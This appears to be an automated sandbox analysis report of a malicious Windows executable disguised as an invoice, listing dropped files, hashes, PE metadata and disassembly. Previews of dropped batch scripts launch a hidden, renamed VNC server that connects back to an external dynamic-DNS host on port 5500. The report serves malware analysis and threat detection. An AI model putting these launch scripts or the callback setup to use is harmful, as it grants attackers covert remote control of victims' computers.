Preview:	SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%999 +100..set /a numb=%random% %%999 +100..set /a numc=5%numa%%numb%....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline \| findstr /i %RUN_C%> NUL..if errorlevel 1 (..start %temp%/~.pdf..) else (.. @echo not starting %RUN_C%: already running...)..echo %numc% > IDD.txt..rem start C:\Games\taskhost.exe -multi -autoreconnect ID:%numc% -connect vnvariant2024.ddnsfree.com:5500 -run..start C:

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	253280
Entropy (8bit):	6.610000632203147
Encrypted:	false
SSDEEP:	6144:vroB+yBBquE2s4MSp5Y1HKKfkXNoIij+bvNf4wmNJh/WLX:E+yhEBge1H0rij+RQwgh/Wz
MD5:	1D34EBEE7F7B9966DC449388438E80D5
SHA1:	E3A30BC84D733ED907A2CBBFC3F5E16900A5B2CE
SHA-256:	0D44439A0425DF8ABF338BD1496679A144DD705A51832A05C1A4ED1F76756EBA
SHA-512:	D7A8AC4E9D824DCB1C8AF5574E7818ED6F515A75C47F50AB380492F87CF0D0AC853956DD93262286C064FFE5E48CEC899A960DD20E466B74E911C88975AB3E0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C...........h......h.....h......U......U...b..U......h........................A..........Rich...........PE..L......_...........!.........$.......j...................................................@..........................u.......u..........................`............1..p...........................P2..@............................................text...o........................... ..`.rdata..............................@..@.data....+...........p..............@....SharedD............................@....rsrc...............................@..@.reloc...........0..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\on.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	799
Entropy (8bit):	5.23166754615022
Encrypted:	false
SSDEEP:	24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7oy:6oo7urwEiNUoy
MD5:	FD877AE342E4E8B246D11700EB90B23D
SHA1:	9C1790DB6B9CBD9C5BF2B12B8FBCF6A342A6FD3A
SHA-256:	1CE4768F825372D55C1D30CE3AC41AFB913DE6299A64AE5B0AC1B3B752421D64
SHA-512:	2B26CAE19DC5C485076C6C8C740F5E621F1B507163D26FB8E31CCE78F6917A170FE9D9BA0976E7C6079ED50F448FCEA1C365E0B3F4C522981C10330C04932E99
Malicious:	false
Preview:	::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..start C:\Games\viewer.exe /HideWindow C:\Games\c.cmd..EXIT

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\once.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:4Q:4Q
MD5:	F24F62EEB789199B9B2E467DF3B1876B
SHA1:	DE3AC21778E51DE199438300E1A9F816C618D33A
SHA-256:	E596899F114B5162402325DFB31FDAA792FABED718628336CC7A35A24F38EAA9
SHA-512:	C2636AD578F7B925EE4CF573969D4EC6640DE7B0176BF1701ADECE3A75937DC206AB1B8EE5343341D102C3BED1EC804A5C2A9E1222A7FB53A3CC02DA55487329
Malicious:	false
Preview:	exit

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\powercfg.msi

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	976384
Entropy (8bit):	6.553744622059538
Encrypted:	false
SSDEEP:	24576:m7bYOINVUuD6yS1wGbXpsHzCsa1fLK/hVrA:m7bYO+UuD6ySaGbX+H9at+hVrA
MD5:	AA6C669C39D9BE8B6289F10DAAFBA6F3
SHA1:	A7A73BD177B58847F42DAE48DA443E33482DD337
SHA-256:	C5BF02C8C23DBF8798D87FAD91EA44A3153FC1026248BD931F360BA0D6C5989E
SHA-512:	1A7A272E63BEDA9B887158E8187C5D8A2351B21FDF912951555CF0DB9F693A4C92DEC4628C9FFE2E535D7FB869E03C12EB236DC8FD21E2118ED1BF193A010E93
Malicious:	false
Preview:	......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<.............../...#........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...-.......3...0...@...1...2...5...4...=...6...7...8...9...:...;.......e...>...?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...`...a...b...c...d...f...y...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2648008
Entropy (8bit):	6.675995874896264
Encrypted:	false
SSDEEP:	49152:Z2snRpZfSwHuWoeeArWCPu6xec3dAAUA/JNw:YsR7Xl7pu6x/I
MD5:	663FE548A57BBD487144EC8226A7A549
SHA1:	6F3E790D8E42A7C1655C37A64852BAB9EEAADCEE
SHA-256:	3FB38EEFB8DB4D52BE428FACC8A242997AB2AD58A8D08980A7688C9BF0B30454
SHA-512:	63203A0FC98E9158AEB5C668FE093A1B1C11565D1222F48F259325EE2E715038A2585F9C307047E33FA778877C2129D926A0D15BFED6B6638E4AE01B78786A6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 10%, Browse
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......+.meo..6o..6o..6...7c..6...7...6...7{..6...6a..6=..7{..6=..7u..6=..7_..6...7H..6o..6C..6...7n..6o..6...6...7r..6...7..6...7n..6...6n..6o..6n..6...7n..6Richo..6........PE..L...3*4e.....................>......3.............@.......................... 0.......(...@.................................d...,.....".(............@(..'...`/. ...`~..8............................~..@............................................text...F........................... ..`.rdata..z=.......>..................@..@.data...............................@....rsrc...(.....".....................@..@.reloc.. ....`/.......'.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	412832
Entropy (8bit):	6.584221629525791
Encrypted:	false
SSDEEP:	12288:zeLkVzUuD6yjqilGbz+ytVYeVhu1CeYv5dSCsHBl:z0klUuD6yjqwGb3YKndxsD
MD5:	29ED7D64CE8003C0139CCCB04D9AF7F0
SHA1:	8172071A639681934D3DC77189EB88A04C8BCFAC
SHA-256:	E48AAC5148B261371C714B9E00268809832E4F82D23748E44F5CFBBF20CA3D3F
SHA-512:	4BDD4BF57EAF0C9914E483E160182DB7F2581B0E2ADC133885BF0F364123D849D247D3F077A58D930E80502A7F27F1457F7E2502D466AEC80A4FBEEBD0B59415
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.5E0.[.0.[.0.[.$.X.>.[.$.^...[..._.!.[...X.'.[...^.`.[.$._.'.[.$.].1.[.$.Z.#.[.0.Z...[...R.#.[....1.[.0...1.[...Y.1.[.Rich0.[.................PE..L...f..^.........."......z...........P............@..................................#....@.................................h........0...............2.......@..<;.....p...........................@...@............................................text....x.......z.................. ..`.rdata...S.......T...~..............@..@.data....6..........................@....rsrc........0......................@..@.reloc..<;...@...<..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	87728
Entropy (8bit):	6.419830608221278
Encrypted:	false
SSDEEP:	1536:IOmWBhamWHh2ZAErVlIwHnURbrK3qCLZO8asWgcdle0yBCaaeJH47EcS:IOmo9rJVltnURbMsxletBCaaeJH47EcS
MD5:	7065625D4F5E1730EADE5A9B4B5A6948
SHA1:	A8F96C8708E0BD23FC9F0B959C49863080A188DD
SHA-256:	4D12FEBD622266220AA2DD2074972EE82545C144DC599F68866212A29DB9F442
SHA-512:	A55E9F1581E3410989EE9C0DAC394E0CF3E3085CAF623F6082E2B3C06A776789B86B87CF17CEEAF582B762B2D6B3C1D554B67A91AE7F87782BC5B6DCCD082186
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... . -djN~djN~djN~p.M.njN~p.K..jN~p.J.vjN~..K.EjN~..J.kjN~..M.ujN~p.O.mjN~djO~.jN~..K.ejN~..N.ejN~...~ejN~dj.~ejN~..L.ejN~RichdjN~........................PE..L...o.&a...........!.................%..............................................&................................'.......(..d....`...............<.......p..........T...........................0...@............................................text............................... ..`.rdata...a.......b..................@..@.data........@......................@....rsrc........`.......&..............@..@.reloc.......p.......,..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {1CBDA787-08B6-4366-B2DC-C0D053E322DE}, Number of Words: 8, Subject: Photo and vn, Author: Photo and Fax Vn, Name of Creating Application: Photo and vn (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Photo and vn. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jan 14 08:14:24 2024, Last Saved Time/Date: Sun Jan 14 08:14:24 2024, Last Printed: Sun Jan 14 08:14:24 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2615808
Entropy (8bit):	6.621481030425916
Encrypted:	false
SSDEEP:	49152:tt/eWK9YwPhH9D+g5jv5m36W547vB+gjB1JMDhB5geIF/bseA:zmD+cmqvPjB1cE
MD5:	ADC098D9A02A0A0710E8A7D6D2BFEA1D
SHA1:	46167254D9A5475A3D0A36DCDB7F4031A8B148D1
SHA-256:	B73B46F35142989A10C91AA887F94037271B8EE7148CC3BFB061AE9848ED1FD9
SHA-512:	6B8C29E98E246BC60FD612DC9ACC80760000EE9867A7B656B9CD4201831559A62C1DB9278282E6F63692EE7EE71DEEC62163C8C41F9174D7255BFD1427B6CF8F
Malicious:	false
Preview:	......................>...................(...................................M.......f.......S...T...U...V...W...X...Y.......O...P...Q...R...S...T...U...V...W...X...Y...Z...?...@...A...B...C...D...E...F...G...H...I...J...K...L.......................................................................................................................................................................................................................................................................................................<...................1...;....................................................................................... ...!..."...#...$...%...0...'...(...)...*...+...,...-......./.......2...8...3...4...5...6...7...<...9...:...C...F...=...>...?...@...A...B...C...D...E...O...G...H...I...J...K...L...F.......O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\holder0.aiph

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	data
Category:	dropped
Size (bytes):	4488558
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	E819399D28E8E9609668E3A7D70D66A6
SHA1:	F0DD69687E297372EEFD387BA470EFC23A40F7A8
SHA-256:	54B022ED416A22F82DF0B5C7A360E3923AF35ACEE6A6BAC7410B53B5EC8FBB63
SHA-512:	A0429517A6B86084267230E47404195C15C330B5F9F567693924B702CE7874DACD47B273F0964442C1BE3E97D11962189D2F0B07D24EB8A9AED9C26470278925
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.208966082694623
Encrypted:	false
SSDEEP:	3:nLWGWNI3ov:nyGWNOov
MD5:	F2CE4C29DC78D5906090690C345EAF80
SHA1:	D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
SHA-256:	0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
SHA-512:	51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
Malicious:	false
Preview:	No Instance(s) Available....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\findstr.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.664980475282005
Encrypted:	false
SSDEEP:	3:oiAWOYWtNhEwnezXARFVfGv+XF9zAZI4Nov:oiAWOUX0jfGv+1+Iwov
MD5:	6FBC0BA88ECEA5FDAA9FBC3674EEE9BA
SHA1:	407BC3657D3F1C0E71C76D5A38E4B6AB4764C83F
SHA-256:	0A578F98A93F7BD5B3ADC1963C034FFC8A3432A2AB121076FCA45437D3325842
SHA-512:	342E00DB0A20EA67E7DFB41CEFB65E71AECA055A013F929CA77358903B79AC20D812FCF3D49B8A425E0591BD8E76A65F64DFA96A3B99B485ED54FCC77C8B5A5E
Malicious:	false
Preview:	C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run ...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.141133782753418
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Preventivo24.01.11.exe
File size:	5'955'744 bytes
MD5:	32f35b78a3dc5949ce3c99f2981def6b
SHA1:	18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:	0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
SHA512:	e14962926f7544f894b84b3091b884b2f9b54c8b40e44e55c43b2df112d68555ddfca268353e278651cc7994011e456ac4515f1b7f0787e499f19dbd75d95cb5
SSDEEP:	98304:7azvMgOJRWT7tRyYsQdTEDdoJr7dJDqpbhUwkasM+u1JfJXibUPHI:7azvMgOJRWT7ukTE5oNqZX1WUA
TLSH:	0C569D30B15AC62ED56241F1192CDAAB911D6D3A0F6190DBB3DC7E6F2BB04C35236E27
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ul..1...1...1...............0...7...%...7...(...7...\.......=.......*.......8.......0...1.......\.......\.l.0...1...0...\...0..

File Icon


Icon Hash:	30281012004140c2

Static PE Info

General

Entrypoint:	0x60b100
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6582CD64 [Wed Dec 20 11:17:56 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	36aca8edddb161c588fcf5afdc1ad9fa

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=CodeSigningCert
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	28/02/2023 12:15:47 28/02/2025 12:25:47
Subject Chain	CN=CodeSigningCert
Version:	3
Thumbprint MD5:	5082070071D2E70CFB8AF6145E2E0DAD
Thumbprint SHA-1:	A1846ABF798522A5B115A90F5C3283CE050626F2
Thumbprint SHA-256:	0C21B06B3EDE50F24284DDB567B4370193279F3E59A9A1BB602D9A9C230B4D28
Serial:	12E79E88324CCEA94E0358CCB4A75075

Entrypoint Preview

Instruction
call 00007F1BED05E4ABh
jmp 00007F1BED05DCEDh
push ebp
mov ebp, esp
and dword ptr [0074EC4Ch], 00000000h
sub esp, 24h
or dword ptr [0074B020h], 01h
push 0000000Ah
call dword ptr [00697268h]
test eax, eax
je 00007F1BED05E022h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
nop
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
or eax, dword ptr [ebp-08h]
or eax, edi
mov dword ptr [ebx+04h], esi
mov dword ptr [ebx+08h], ecx
mov dword ptr [ebx+0Ch], edx
jne 00007F1BED05DEB5h
mov eax, dword ptr [ebp-24h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007F1BED05DE95h
cmp eax, 00020660h
je 00007F1BED05DE8Eh
cmp eax, 00020670h
je 00007F1BED05DE87h
cmp eax, 00030650h
je 00007F1BED05DE80h
cmp eax, 00030660h
je 00007F1BED05DE79h
cmp eax, 00030670h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x349108	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x359000	0x56a58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5adb10	0x590
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3b0000	0x2d550	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2eb4b0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2eb540	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2bcb50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x297000	0x320	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3463bc	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x295bca	0x295c00	9df1023178e489408abd4de59ea6f5ec	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x297000	0xb3362	0xb3400	1a85f2a6b8a9c3902456bab47389e1fe	False	0.32838378225244075	data	5.079377208024134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34b000	0xcc00	0x3400	97e28501cab3e5e33657a71481a58ba7	False	0.23963341346153846	data	4.542379696709195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x358000	0x710	0x800	1b38fc929380aabe59305fcde2681d14	False	0.40966796875	data	4.5338796899883915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x359000	0x56a58	0x56c00	41897894c7d6aefff121b66fdd927208	False	0.11699049891930836	data	4.274410528854854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3b0000	0x2d550	0x2d600	b8dcb36c465b4630e3506c3a7521632f	False	0.4789568267906336	data	6.568383422414792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x3598e0	0x13e	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors	English	United States	0.25471698113207547
RT_BITMAP	0x359a20	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.03017241379310345
RT_BITMAP	0x35a248	0x48a8	Device independent bitmap graphic, 290 x 16 x 32, image size 0	English	United States	0.11881720430107527
RT_BITMAP	0x35eaf0	0xa6a	Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m	English	United States	0.21680420105026257
RT_BITMAP	0x35f55c	0x152	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors	English	United States	0.5295857988165681
RT_BITMAP	0x35f6b0	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.4875478927203065
RT_ICON	0x35fed8	0x2b528	Device independent bitmap graphic, 256 x 336 x 32, image size 172032, resolution 2834 x 2834 px/m	English	United States	0.11184685090843514
RT_ICON	0x38b400	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08703319502074688
RT_ICON	0x38d9a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.16463414634146342
RT_ICON	0x38ea50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18565573770491803
RT_ICON	0x38f3d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3262411347517731
RT_DIALOG	0x38f840	0xac	data	English	United States	0.7151162790697675
RT_DIALOG	0x38f8ec	0xcc	data	English	United States	0.6911764705882353
RT_DIALOG	0x38f9b8	0x1b4	data	English	United States	0.5458715596330275
RT_DIALOG	0x38fb6c	0x136	data	English	United States	0.6064516129032258
RT_DIALOG	0x38fca4	0x4c	data	English	United States	0.8289473684210527
RT_STRING	0x38fcf0	0x234	data	English	United States	0.4645390070921986
RT_STRING	0x38ff24	0x182	data	English	United States	0.5103626943005182
RT_STRING	0x3900a8	0x50	data	English	United States	0.7375
RT_STRING	0x3900f8	0x9a	data	English	United States	0.37662337662337664
RT_STRING	0x390194	0x2f6	data	English	United States	0.449868073878628
RT_STRING	0x39048c	0x5c0	data	English	United States	0.3498641304347826
RT_STRING	0x390a4c	0x434	data	English	United States	0.32899628252788105
RT_STRING	0x390e80	0x100	data	English	United States	0.5703125
RT_STRING	0x390f80	0x484	data	English	United States	0.39186851211072665
RT_STRING	0x391404	0x1ea	data	English	United States	0.44081632653061226
RT_STRING	0x3915f0	0x18a	data	English	United States	0.5228426395939086
RT_STRING	0x39177c	0x216	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.46254681647940077
RT_STRING	0x391994	0x624	data	English	United States	0.3575063613231552
RT_STRING	0x391fb8	0x660	data	English	United States	0.3474264705882353
RT_STRING	0x392618	0x2e2	data	English	United States	0.4037940379403794
RT_GROUP_ICON	0x3928fc	0x14	data	English	United States	1.2
RT_VERSION	0x392910	0x30c	data	English	United States	0.441025641025641
RT_HTML	0x392c1c	0x3835	ASCII text, with very long lines (443), with CRLF line terminators	English	United States	0.08298005420807561
RT_HTML	0x396454	0x1316	ASCII text, with CRLF line terminators	English	United States	0.18399508800654932
RT_HTML	0x39776c	0x8c77	HTML document, ASCII text, with CRLF line terminators	English	United States	0.08081426068578103
RT_HTML	0x3a03e4	0x6acd	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10679931238798873
RT_HTML	0x3a6eb4	0x6a2	HTML document, ASCII text, with CRLF line terminators	English	United States	0.3486454652532391
RT_HTML	0x3a7558	0x104a	HTML document, ASCII text, with CRLF line terminators	English	United States	0.2170263788968825
RT_HTML	0x3a85a4	0x15b1	HTML document, ASCII text, with CRLF line terminators	English	United States	0.17612101566720692
RT_HTML	0x3a9b58	0x205c	exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators	English	United States	0.13604538870111058
RT_HTML	0x3abbb4	0x368d	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10834228428213391
RT_MANIFEST	0x3af244	0x813	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.41025641025641024

Imports

DLL

Import

KERNEL32.dll

WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, 